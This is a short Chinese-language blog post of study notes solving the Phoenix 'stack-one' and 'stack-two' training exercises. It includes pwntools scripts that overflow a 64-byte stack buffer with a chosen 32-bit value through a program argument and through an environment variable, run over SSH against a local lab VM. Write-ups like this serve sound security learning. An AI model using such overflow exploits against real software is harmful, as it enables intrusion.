# [pwn笔记1]stack-one和stack-two (Phoenix)

**Published by:** [BuringStraw](https://paragraph.com/@buringstraw/)
**Published on:** 2023-03-24
**URL:** https://paragraph.com/@buringstraw/pwn-1-stack-one-stack-two-phoenix

## Content

这两道非常简单，而且只有数据读入方式的区别。跟zero一样，只是对覆盖的数据有要求。Unsupported embedstack-one将程序第一个参数strcpy到字符串。notion image在gdb中run后面直接接参数即可带上参数。 pwntools的sh.run可以接收字节数组作为参数，里面可包含启动参数。（看了下文档，对于run方法：Backward compatibility. Use system() ）from pwn import * shell = ssh("user", "localhost", password="user", port=2222) s = b"a" * 0x40 + p32(0x496c5962) sh = shell.run(b"/opt/phoenix/amd64/stack-one " + s) print(sh.recvlines(2)) Unsupported embedstack-two这次是写到环境变量里。notion image做到这里发现环境变量里写"\0"进去会出问题，我们要求写入的是32位数据，不应该用p64，用了就会自动补0，然后报错。from pwn import * shell = ssh("user", "localhost", password="user", port=2222) s = b"a" * 0x40 + p32(0x0d0a090a) print(s) s = s.decode() print(s) sh = shell.run(b"/opt/phoenix/amd64/stack-two", env={"ExploitEducation": s}) print(sh.recvlines(2))

## Publication Information

- [BuringStraw](https://paragraph.com/@buringstraw/): Publication homepage
- [All Posts](https://paragraph.com/@buringstraw/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@buringstraw): Subscribe to updates